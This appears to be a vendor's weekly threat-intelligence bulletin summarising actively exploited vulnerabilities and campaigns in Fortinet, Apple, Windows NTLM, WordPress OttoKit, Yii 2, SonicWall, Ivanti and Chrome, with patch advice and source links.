A wave of active threat activity this week underscores how both legacy flaws and newly surfaced vulnerabilities remain prime targets for exploitation. CISA has added a four-year-old SonicWall SMA100 vulnerability to its KEV catalog, signaling active exploitation despite its age. Apple issued emergency security updates to address two zero-day vulnerabilities leveraged in sophisticated attacks across multiple platforms, including iOS, macOS, tvOS, iPadOS, and visionOS. Meanwhile, Check Point Research uncovered the weaponization of a recently patched NTLM hash disclosure vulnerability in Microsoft Windows, exploited just days post-disclosure.  Web application security also remains in the crosshairs, with active exploitation of critical flaws in the OttoKit WordPress plugin and the Yii 2 PHP framework, emphasizing the urgent need for timely patching, threat detection, and continuous monitoring across enterprise environments.  

A notable spike in botnet-driven campaigns were observed, with EnemyBot, Sysrv-K, Andoryu, and Androxgh0st leveraging known flaws in Cloud Gateway, GitLab, and PHP applications. At the same time, IoT botnets such as Bashlite, BricketBot, Tsunami, and Mirai ramped up exploitation efforts, aggressively targeting Eir D1000 modems to expand their botnet infrastructure.  

CISA has analyzed the RESURGE malware, which targets Ivanti Connect Secure appliances, offering persistence, credential theft, and privilege escalation. At the same time, Kaspersky exposed Operation ForumTroll, a cyber-espionage campaign exploiting a Google Chrome zero-day to target Russian media and academic sectors. Fortinet also reported a stealthy post-exploitation technique, where attackers used historical zero-days to retain access to compromised devices, even after patching, by leaving behind symbolic links for read-only access to sensitive files. Meanwhile, Cyble uncovered a bold new ransomware variant dubbed DOGE BIG BALLS, delivered via phishing and obfuscated PowerShell, exploiting Intel drivers to achieve kernel-level privilege escalation and stealthy persistence.

As threat actors grow more sophisticated, swift patching, proactive monitoring, and continuous vigilance are essential to staying ahead of both emerging and lingering threats.

Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping to make informed decisions.  

‍CVE-2025-3102

An Authorization Bypass Vulnerability in the OttoKit WordPress plugin (formerly known as SureTriggers) has been identified, allowing attackers to create administrator-level accounts under specific conditions. With a high CVSS Score of 8.1, this flaw affects all versions up to and including 1.0.78. The vulnerability arises from the lack of an empty value check on the secret_key parameter within the authenticate_user() function, enabling unauthorized access if the plugin is installed but not properly configured. The Brainstorm Force development team addressed the issue in version 1.0.79. Alarmingly, the flaw has already been subjected to active exploitation just hours after its public disclosure, highlighting the urgent need for users to update the patched version immediately.

‍CVE-2025-24054

A NTLM Hash Disclosure Vulnerability in Microsoft Windows enables attackers to leak NTLMv2-SSP hashes via specially crafted .library-ms files. This vulnerability is triggered when a user simply opens the malicious file, causing Windows Explorer to automatically initiate an SMB authentication request to a remote server, leaking the user's NTLM hash without any user interaction.  

The flaw, which impacts all supported versions of Windows, was patched by Microsoft on March 11, 2025. Less than two weeks after disclosure, threat actors began actively exploiting this flaw. According to Check Point, the campaign dubbed "NTLM Exploits Bomb" was detected around March 20–21, 2025 and has targeted both government and private entities in Poland and Romania. Victims received malspam emails containing Dropbox-hosted archives, which, once extracted, triggered NTLM hash leaks to attacker-controlled SMB servers based in Russia, Bulgaria, the Netherlands, Australia, and Turkey.  These events highlight the critical need for organizations to apply security patches promptly and monitor outbound authentication traffic to detect and prevent credential leakage through such stealthy exploitation techniques.

‍CVE-2025-31200

A Memory Corruption Vulnerability has been identified in Apple's Core Audio Framework, which could lead to arbitrary code execution when processing an audio stream embedded in a maliciously crafted media file. This issue affects multiple Apple platforms, including iOS, macOS, tvOS, iPadOS, and visionOS, and carries a high CVSS score of 7.5. Apple confirmed that this flaw has been exploited as zero-day in the wild as part of a highly sophisticated attack campaign specifically targeting individual iOS users. In response to its wild exploitation, Apple swiftly released critical security updates across its ecosystem, including iOS and iPadOS 18.4.1, macOS Sequoia 15.4.1, tvOS 18.4.1, and visionOS 2.4.1. Users are strongly urged to immediately update their devices to these patched versions to safeguard against potential compromise.

‍CVE-2025-31201

A Vulnerability in the Remote Procedure Authentication Component (RPAC) of Apple's operating systems could allow an attacker with arbitrary read and write access to bypass Pointer Authentication (PAC), a crucial security mechanism designed to mitigate memory-related exploits in iOS.  Apple confirmed that this flaw has been exploited as zero-day in the wild as part of a highly sophisticated attack campaign specifically targeting individual iOS users. In response, Apple swiftly released critical security updates across its ecosystem, including iOS and iPadOS 18.4.1, macOS Sequoia 15.4.1, tvOS 18.4.1, and visionOS 2.4.1.  Considering the confirmed wild exploitation, users are strongly urged to update their devices to the latest versions to mitigate potential risks.

‍CVE-2024-21762

An Out-of-Bounds Write Vulnerability in Fortinet FortiOS allows remote unauthenticated attackers to execute arbitrary commands through specially crafted HTTPS requests. Recent investigations by Fortinet revealed active exploitation of this flaw by an unknown threat actor to gain unauthorized access to vulnerable FortiGate devices. Historically, this vulnerability has also been weaponized by multiple threat groups, including the state-sponsored Volt Typhoon (to deploy COATHANGER malware), Black Basta ransomware, and the Mirai botnet, demonstrating its persistent value in a wide range of malicious campaigns. In response, Fortinet released security updates for FortiOS versions 7.6.2, 7.4.7, 7.2.11, 7.0.17, and 6.4.16. These updates not only remove the symbolic link used in post-exploitation techniques but also harden the SSL-VPN interface to prevent unauthorized file serving. The incident reinforces the importance of prompt patching and continuous security monitoring to defend against evolving post-exploitation methods.

‍CVE-2024-58136

An Improper Protection of Alternate Path Vulnerability has been identified in the Yii 2 PHP web application framework. With a critical CVSS Score of 9.0, this flaw affects versions prior to 2.0.52 and has been patched in version 2.0.52. Yii 2, a modern a modern and high-performance PHP framework, is designed for developer productivity and application performance, offering sensible default configurations and customizable components for diverse web development needs. The vulnerability is a regression of the previously addressed CVE-2024-4990, tied to the framework’s Behavior system, where improperly validated input could allow arbitrary object instantiation through unsafe reflection. Active exploitation of this flaw was observed between February and April 2025, underscoring the urgency for users to update affected installations immediately.

CVE-2023-27997

A Heap-Based Buffer Overflow Vulnerability in the SSL-VPN component of Fortinet FortiOS and FortiProxy allows unauthenticated remote attackers to execute arbitrary commands through specially crafted requests. Fortinet’s recent investigation confirmed that this flaw is currently being actively exploited by an unknown threat actor to gain unauthorized access to vulnerable FortiGate devices. Historically, this vulnerability has been leveraged by several advanced threat groups, including Earth Kasha and the state-sponsored Volt Typhoon, to deploy malware such as the NOOPDOOR backdoor and LODEINFO, underscoring its sustained utility in a variety of malicious campaigns. In response, Fortinet released patches for FortiOS versions 7.6.2, 7.4.7, 7.2.11, 7.0.17, and 6.4.16. These updates remove the malicious symbolic link used in post-exploitation activity and reinforce the SSL-VPN interface to prevent further abuse. This incident highlights the ongoing importance of timely patching, proactive threat detection, and layered defenses to combat sophisticated exploitation tactics.

‍CVE-2022-42475

A Heap-Based Buffer Overflow Vulnerability in Fortinet FortiOS allows unauthenticated remote attackers to execute arbitrary commands through specially crafted requests. Fortinet's recent investigation confirmed that this flaw is under active exploitation by an unknown threat actor targeting vulnerable FortiGate devices. Historically, this vulnerability has been weaponized by several advanced threat groups including UNC3886, Volt Typhoon, RansomHouse and served as a vector for deploying high-profile malware such as the Mirai botnet, COATHANGER, and BOLDMOVE, reflecting its broad appeal across diverse attack campaigns. In response, Fortinet issued patches for FortiOS versions 7.6.2, 7.4.7, 7.2.11, 7.0.17, and 6.4.16. These updates remove the symbolic link used in post-exploitation and harden the SSL-VPN interface to block further misuse. The incident reinforces the critical need for timely security updates, proactive threat detection, and robust defense strategies to stay ahead of evolving attack techniques.

‍CVE-2021-20035

An OS Command Injection Vulnerability affecting the management interface of SonicWall SMA100 Appliances allows a remote authenticated attacker to execute arbitrary commands as the 'nobody' user, potentially leading to code execution. Originally disclosed in 2021, this vulnerability has come under renewed scrutiny due to observed in-the-wild exploitation, prompting SonicWall to update its security advisory and release multiple fixed versions. Following this development, this vulnerability has also been added to the CISA Known Exploited Vulnerabilities (KEV) catalog, further highlighting its current relevance and threat level.

Telemetry collected from Loginsoft sensors were analyzed and processed to derive insights on what is actively being exploited and actively being scanned.  As source of truth, source IPv4 addresses & payloads can be provided on need-to-know basis.

Identified vulnerabilities exploited by botnets, including recent CVEs logged in Misp. Presenting the top 5 CVEs with payloads suggestive of botnet activities, like utilizing wget with IP addresses.

We proactively monitor the vulnerabilities which are targeted by adversaries. Each vulnerability is humanly studied and mapped with Mitre ATT&CK tactics and techniques. Source of information is derived from our vulnerability intelligence platform collected and curated information from various sources such as Twitter, Telegram, OSINT groups, Blogs, Data leak Sites and more.  

CVE-2025-0282

The Cybersecurity and Infrastructure Security Agency (CISA) has released a Malware Analysis Report detailing a new malware variant, RESURGE, linked to the exploitation of CVE-2025-0282 in Ivanti Connect Secure appliances. RESURGE shares functionalities with the SPAWNCHIMERA malware, including persistence across reboots, but introduces unique commands that create web shells, manipulate integrity checks, and modify files. These capabilities enable credential harvesting, unauthorized account creation, password resets, and privilege escalation.

CVE-2025-2783

Kaspersky's Global Research and Analysis Team (Great) has uncovered a state-sponsored APT attack, dubbed Operation ForumTroll, which exploits a zero-day vulnerability, CVE-2024-2783, in Google Chrome to conduct cyber-espionage against Russian media professionals and academic institutions. attack begins with phishing emails impersonating invitations to the Primakov Readings forum, containing malicious links that redirect victims to an attacker-controlled website. If a Windows PC user with Google Chrome or any Chromium-based browser clicks the link, malware is deployed automatically, requiring no further action from the victim. The CVE-2025-2783 vulnerability, a logic flaw between Chrome and the Windows operating system, enables sandbox protection bypass, allowing attackers to execute remote code. Kaspersky reported the flaw to Google, which swiftly released a patch. Given the highly targeted nature of the attack, organizations are urged to immediately apply the latest Chrome security update and strengthen their phishing defenses to mitigate the risk.

‍Symlink Backdoor targets over 16,000 Fortinet Devices Worldwide

Fortinet has recently uncovered a post-exploitation technique used by an unknown threat actor, actively exploiting known vulnerabilities that were previously patched. This issue, linked to historic exploitation campaigns starting in 2023, involves zero-day vulnerabilities like CVE-2024-21762, CVE-2023-27997 and CVE-2022-42475. The threat actor created a symbolic link between the user and root filesystems within the SSL-VPN language folder, a modification that bypassed detection. Even after patching, this symlink allowed continued read-only access to sensitive files, including configurations, leaving devices vulnerable.

As of April 15, 2025, the Shadowserver Foundation identified 16,620 internet-exposed Fortinet devices compromised by this backdoor, with the majority located in Asia (7,886), followed by Europe (3,766) and North America (3,217). In response, Fortinet released FortiOS updates (7.6.2, 7.4.7, 7.2.11, 7.0.17, 6.4.16) to remove the symbolic link and strengthen SSL-VPN security. This highlights the importance of timely patching and continuous threat monitoring to prevent such exploits.

‍CVE-2015-2291

Cyble researchers have uncovered a new ransomware variant named DOGE BIG BALLS, notable not just for its audacious name but also for its sophisticated use of psychological manipulation and technical stealth. The attack begins with a deceptive phishing email containing a ZIP archive titled “Pay Adjustment.zip”, which houses a malicious shortcut file named “Pay Adjustment.pdf.lnk.” When executed, this file launches a series of obfuscated PowerShell commands, triggering a multi-stage infection chain.  A critical component of the attack is the exploitation of CVE-2015-2291, a vulnerability in Intel’s Ethernet diagnostics driver (iqvw64e.sys), which allows arbitrary code execution at the kernel level via crafted IOCTL calls. The attacker utilizes a tool called ktool.exe to install the vulnerable driver as a kernel-mode service, granting direct access to kernel memory. This enables the ransomware to inject a SYSTEM process token, escalate privileges, disable security logging, and maintain a stealthy foothold in the system.

It refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.

1. https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24054  
2. https://research.checkpoint.com/2025/cve-2025-24054-ntlm-exploit-in-the-wild/  
3. https://www.bleepingcomputer.com/news/security/over-16-000-fortinet-devices-compromised-with-symlink-backdoor/  
4. https://www.cisa.gov/news-events/alerts/2025/04/16/cisa-adds-one-known-exploited-vulnerability-catalog  
5. https://www.fortinet.com/blog/psirt-blogs/analysis-of-threat-actor-activity  
6. https://www.wordfence.com/blog/2025/04/100000-wordpress-sites-affected-by-administrative-user-creation-vulnerability-in-suretriggers-wordpress-plugin/  
7. https://www.yiiframework.com/news/709/please-upgrade-to-yii-2-0-52
8. https://www.cisa.gov/news-events/alerts/2025/03/28/cisa-releases-malware-analysis-report-resurge-malware-associated-ivanti-connect-secure  
9. https://www.kaspersky.co.in/blog/forum-troll-apt-with-zero-day-vulnerability/28692/